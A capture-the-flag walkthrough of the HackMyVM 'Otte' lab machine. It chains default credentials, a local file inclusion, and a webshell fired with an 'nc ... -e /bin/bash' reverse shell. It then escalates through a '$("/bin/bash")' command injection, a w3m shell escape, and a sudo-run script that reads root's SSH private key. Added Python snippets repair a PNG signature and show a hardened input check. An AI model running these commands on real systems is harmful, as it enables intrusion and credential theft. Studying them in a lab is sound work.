HackMyVm Otte Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Otte
Scan all TCP ports first.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for 192.168.56.100 (192.168.56.100)
Host is up (0.00099s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 89 May 15 12:25 note.txt
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 e8:38:58:1b:75:c5:53:47:32:10:d4:12:79:69:c8:ad (RSA)
| 256 35:92:34:4e:cd:65:c6:08:20:76:35:ba:d9:09:64:65 (ECDSA)
|_ 256 a2:87:9f:60:a4:0d:c5:43:6a:4f:02:79:56:ff:6e:d9 (ED25519)
80/tcp open http Apache httpd 2.4.38
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Siemens - Root authentification
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 401 Unauthorized
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Log in to FTP anonymously and grab note.txt.
cat note.txt
Hi thomas ! I put on you personal folder the php code you asked me !
See you later +++
Port 80 requires HTTP Basic authentication.
[image-20210523214949625.png]
The realm string "Siemens - Root authentification" is the hint: look up default credentials for Siemens routers. (This step was hard for me because I had never used a Siemens router.)
https://www.192-168-1-1-ip.co/router/siemens/siemens/17622/
After a few failed attempts we find the working pair:
root zP2wxY4uE
With the credentials we can brute-force directories and files behind the Basic auth.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log -U root -P zP2wxY4uE
/index.php (Status: 200) [Size: 28]
/image (Status: 200) [Size: 47076]
/config.php (Status: 200) [Size: 0]
/thinkgeek.php (Status: 200) [Size: 28]
thinkgeek.php returns the same 28-byte page as index.php, so fuzz it for a parameter name, hiding responses of that size.
wfuzz -u 'http://192.168.56.100/thinkgeek.php?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 28
000007535: 200 0 L 0 W 0 Ch "file"
The parameter is named "file", so try a local file inclusion.
curl -u root:zP2wxY4uE 'http://192.168.56.100/thinkgeek.php?file=../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
...
laetitia:x:1001:1001:,,,:/home/laetitia:/bin/bash
cedric:x:1002:1002:,,,:/home/cedric:/bin/bash
Following the hint in note.txt, fuzz for a PHP file in /home/thomas (hiding the empty responses).
wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/FUZZ.php' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 0
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000016344: 200 2 L 3 W 20 Ch "shell"
shell.php is included and returns 20 bytes on its own; fuzz for the parameter name it expects.
wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 20
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000004959: 200 3 L 6 W 74 Ch "command"
Call shell.php through the inclusion with a reverse-shell command.
http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&command=nc%20192.168.56.150%201234%20-e%20/bin/bash
In another terminal, listen on port 1234 and catch the reverse shell.
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:59386.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Upgrade to an interactive PTY.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@otte:/var/www/html$
In /home/thomas there is a world-readable nightmare.txt and an important_file.
www-data@otte:/home/thomas$ ls -la
ls -la
total 100
drwxr-xr-x 4 thomas thomas 4096 May 20 09:46 .
drwxr-xr-x 5 root root 4096 May 16 12:34 ..
-rw------- 1 thomas thomas 50 May 20 09:46 .Xauthority
lrwxrwxrwx 1 thomas thomas 9 May 16 13:25 .bash_history -> /dev/null
-rw-r--r-- 1 thomas thomas 220 May 15 12:12 .bash_logout
-rw-r--r-- 1 thomas thomas 3526 May 17 14:42 .bashrc
drwxr-xr-x 3 thomas thomas 4096 May 15 14:00 .local
-rw-r--r-- 1 thomas thomas 807 May 15 12:12 .profile
drwx------ 2 thomas thomas 4096 May 17 09:35 .ssh
-rw-r--r-- 1 thomas thomas 61258 May 15 14:44 important_file
-rw-r--r-- 1 thomas thomas 122 May 15 14:56 nightmare.txt
-rwxr-xr-x 1 thomas thomas 93 May 17 09:15 shell.php
www-data@otte:/home/thomas$ cat nightmare.txt
cat nightmare.txt
who is the son of a bitch who replaced the signature on my file with fucking XXX?! I need to find the original signature!
www-data@otte:/home/thomas$
Transfer important_file to the local machine and look at it in a hex dump: the first 8 bytes have been overwritten.
xxd important_file | less
00000000: XXXXXXXXXXXXXXXX 0000 000d 4948 4452 .XXX........IHDR
00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e ...,...,.....y}.
00000020: 7500 0000 1b74 4558 7443 7265 6174 696f u....tEXtCreatio
00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337 n Time.162100737
00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154 9529......7.IDAT
00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085 x.....~.U..... .
00000060: 2214 410a 2208 2294 8214 4428 8582 286a ".A."."...D(..(j
00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9 .P....b.(..I....
...
Searching for IHDR shows this is a PNG: IHDR is the first chunk of every PNG, and the IHDR data here (0000 012c 0000 012c 08 06) decodes to a 300x300, 8-bit RGBA image. The "signature" from nightmare.txt is the 8-byte PNG file signature 89 50 4e 47 0d 0a 1a 0a, which is what was replaced with X's. Write it back over the first 8 bytes.
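The repair as a script, added here as an example and not part of the original writeup. It restores the PNG signature only when an IHDR chunk sits at offset 12 (where it must be in a PNG), then walks the chunk list and recomputes each chunk's CRC32 so a wrong repair or further damage shows up immediately. The sample image is constructed in-memory (a tiny valid PNG, not the file from the box); the function names repair_signature, parse_chunks, ihdr_info and repair_file are the example's own.

```python
import struct
import zlib

# Fixed 8-byte PNG signature (RFC 2083 / ISO 15948).
PNG_SIG = b"\x89PNG\r\n\x1a\n"


def make_chunk(ctype, data):
    """Build one PNG chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png(width=2, height=2):
    """Constructed sample: a minimal valid 8-bit RGBA PNG (not the file from the box)."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    # One scanline = filter byte 0 followed by `width` RGBA pixels (opaque black).
    raw = b"".join(b"\x00" + b"\x00\x00\x00\xff" * width for _ in range(height))
    return (PNG_SIG
            + make_chunk(b"IHDR", ihdr)
            + make_chunk(b"IDAT", zlib.compress(raw))
            + make_chunk(b"IEND", b""))


def repair_signature(data):
    """Restore the signature if the first 8 bytes are wrong but IHDR follows at offset 12."""
    if data[:8] == PNG_SIG:
        return data
    if data[12:16] != b"IHDR":
        raise ValueError("no IHDR chunk at offset 12: not a PNG with a damaged signature")
    return PNG_SIG + data[8:]


def parse_chunks(data):
    """Walk the chunk list after the signature.
    Returns a list of (type, length, crc_ok) so tampering past the header is visible too."""
    chunks = []
    pos = 8
    while pos + 12 <= len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        stored = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]
        crc_ok = (zlib.crc32(ctype + body) & 0xFFFFFFFF) == stored
        chunks.append((ctype, length, crc_ok))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks


def ihdr_info(data):
    """Decode IHDR into (width, height, bit_depth, color_type)."""
    if data[12:16] != b"IHDR":
        raise ValueError("IHDR not at offset 12")
    width, height, depth, ctype = struct.unpack(">IIBB", data[16:26])
    return width, height, depth, ctype


def repair_file(path_in, path_out):
    """Repair a file on disk and return the parsed chunk list of the result."""
    with open(path_in, "rb") as f:
        fixed = repair_signature(f.read())
    with open(path_out, "wb") as f:
        f.write(fixed)
    return parse_chunks(fixed)


if __name__ == "__main__":
    # Self-check on the constructed sample: damage the signature, repair it, verify CRCs.
    good = build_sample_png()
    damaged = b"X" * 8 + good[8:]
    fixed = repair_signature(damaged)
    print("repaired:", fixed == good, "ihdr:", ihdr_info(fixed))
    for ctype, length, ok in parse_chunks(fixed):
        print(ctype.decode(), length, "crc ok" if ok else "CRC MISMATCH")
```

Run it as `python3 repair_png.py` for the self-check, or call repair_file("important_file", "fixed.png") on the downloaded file; every chunk should report its CRC as ok, and a mismatch on IHDR would mean the bytes after the signature were also altered.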
xxd important_file | head
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e ...,...,.....y}.
00000020: 7500 0000 1b74 4558 7443 7265 6174 696f u....tEXtCreatio
00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337 n Time.162100737
00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154 9529......7.IDAT
00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085 x.....~.U..... .
00000060: 2214 410a 2208 2294 8214 4428 8582 286a ".A."."...D(..(j
00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9 .P....b.(..I....
00000080: 7889 a931 3626 8d9a 8ba6 8947 3e5f ddb8 x..16&.....G>_..
00000090: ddee 99f5 ccac 35b3 67ef 773d 3090 7c7f ......5.g.w=0.|.
Open the repaired file (CyberChef's Render Image works if you don't trust the file enough to open it locally): it is a QR code.
[image-20210523212230214.png]
Decode the QR code: it contains a link.
[image-20210523212429143.png]
The link https://eqrcode.co/a/SVxQdM gives thomas's password.
Log in via SSH as thomas and check sudo rights.
thomas@otte:/home/laetitia$ sudo -l
Matching Defaults entries for thomas on otte:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User thomas may run the following commands on otte:
(laetitia) NOPASSWD: /usr/bin/python3 /home/laetitia/simpler.py *
Run simpler.py with -p; when it asks for an IP, inject a command substitution. The wildcard in the sudo rule only allows extra arguments, it is the script's own input handling that is unsafe.
thomas@otte:/home/laetitia$ sudo -u laetitia /usr/bin/python3 /home/laetitia/simpler.py -p
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es
***********************************************
Enter an IP: $("/bin/bash")
laetitia@otte:~$
This shell is not usable: $(...) is a command substitution, so the script captures bash's stdout and nothing we run is echoed back (the prompt appears because it goes to stderr). Run 'nc x.x.x.x xxxx -e /bin/bash' from it blindly to get a second reverse shell, which we can upgrade as before.
[image-20210523220810457.png]
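The page does not show simpler.py's source, so the snippet below is an added example of the bug class and its fix, not the script from the box. It reconstructs the kind of substring blacklist such a "ping helper" uses (the FORBIDDEN list is an assumption), shows why $("/bin/bash") slips past it when the value is handed to a shell, and puts the hardened version beside it: validate the value as an IP address with the standard ipaddress module and run ping as an argv list with no shell at all. Function names blacklist_allows, vulnerable_ping_command, safe_ping_argv and run_safe_ping are the example's own.

```python
import ipaddress
import subprocess

# Assumed reconstruction of a naive blacklist; the real simpler.py is not on this page.
FORBIDDEN = ["&", ";", "-", "`", "||", "|"]


def blacklist_allows(user_input):
    """True when the input contains none of the forbidden substrings.
    Note what is missing: '$', '(', ')', '<', '>', newline."""
    return not any(bad in user_input for bad in FORBIDDEN)


def vulnerable_ping_command(user_input):
    """The command string a naive helper would pass to os.system / shell=True.
    '$(...)' survives the blacklist, and the shell expands it before ping runs."""
    if not blacklist_allows(user_input):
        raise ValueError("forbidden character in input")
    return "ping -c 1 %s" % user_input


def safe_ping_argv(user_input):
    """Hardened version: accept only a syntactically valid IP address and build an
    argv list. Without a shell there is no substitution, chaining or redirection."""
    addr = ipaddress.ip_address(user_input.strip())   # raises ValueError on anything else
    return ["ping", "-c", "1", str(addr)]


def run_safe_ping(user_input):
    """Run the hardened ping and return its exit status (not exercised by the tests)."""
    return subprocess.run(safe_ping_argv(user_input), check=False).returncode


if __name__ == "__main__":
    payload = '$("/bin/bash")'
    print("blacklist lets payload through:", blacklist_allows(payload))
    print("shell would receive:", vulnerable_ping_command(payload))
    print("hardened argv for a real IP:", safe_ping_argv("192.168.56.150"))
    try:
        safe_ping_argv(payload)
    except ValueError as e:
        print("hardened version rejects payload:", e)
```

Running it prints the command string the shell would expand, then shows the hardened path rejecting the same payload before any process is started. The allow-list (parse as an IP) is the fix; extending the blacklist with '$' just moves the problem.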
Check sudo rights again, now as laetitia.
laetitia@otte:~$ sudo -l
sudo -l
Matching Defaults entries for laetitia on otte:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User laetitia may run the following commands on otte:
(cedric) NOPASSWD: /usr/bin/w3m
Start a temporary HTTP server on the attacking machine with php (php -S 0.0.0.0:80), open it with w3m as cedric, and escape to a shell from inside the browser.
sudo -u cedric /usr/bin/w3m http://192.168.56.150
Inside w3m press ! and run /bin/bash; we are now cedric.
[image-20210523221401950.png]
In /home/cedric/.ssh (create it with mode 700 if it is missing), fetch our public key from the same HTTP server as authorized_keys.
wget http://192.168.56.150/id_rsa.pub -O authorized_keys
Then we can log in via SSH as cedric with the matching private key.
Check sudo again.
cedric@otte:~$ sudo -l
Matching Defaults entries for cedric on otte:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cedric may run the following commands on otte:
(ALL : ALL) NOPASSWD: /usr/bin/mmwatch
Reading the mmwatch script shows it executes the command string it is given, and the rule runs it as any user without a password, so we can read root's private SSH key through it.
sudo /usr/bin/mmwatch "cat /root/.ssh/id_rsa"
Save the key locally with mode 600 and log in via SSH as root.
root@otte:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
otte
root@otte:~# ls -la /root
total 40
drwx------ 4 root root 4096 May 20 10:30 .
drwxr-xr-x 18 root root 4096 May 15 12:07 ..
lrwxrwxrwx 1 root root 9 May 16 13:25 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 May 15 12:13 .local
-rw------- 1 root root 1500 May 15 13:23 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwx------ 1 root root 33 May 16 14:02 root.txt
drwx------ 2 root root 4096 May 16 13:24 .ssh
-rw-r--r-- 1 root root 173 May 15 12:19 .wget-hsts
-rw------- 1 root root 100 May 20 10:30 .Xauthority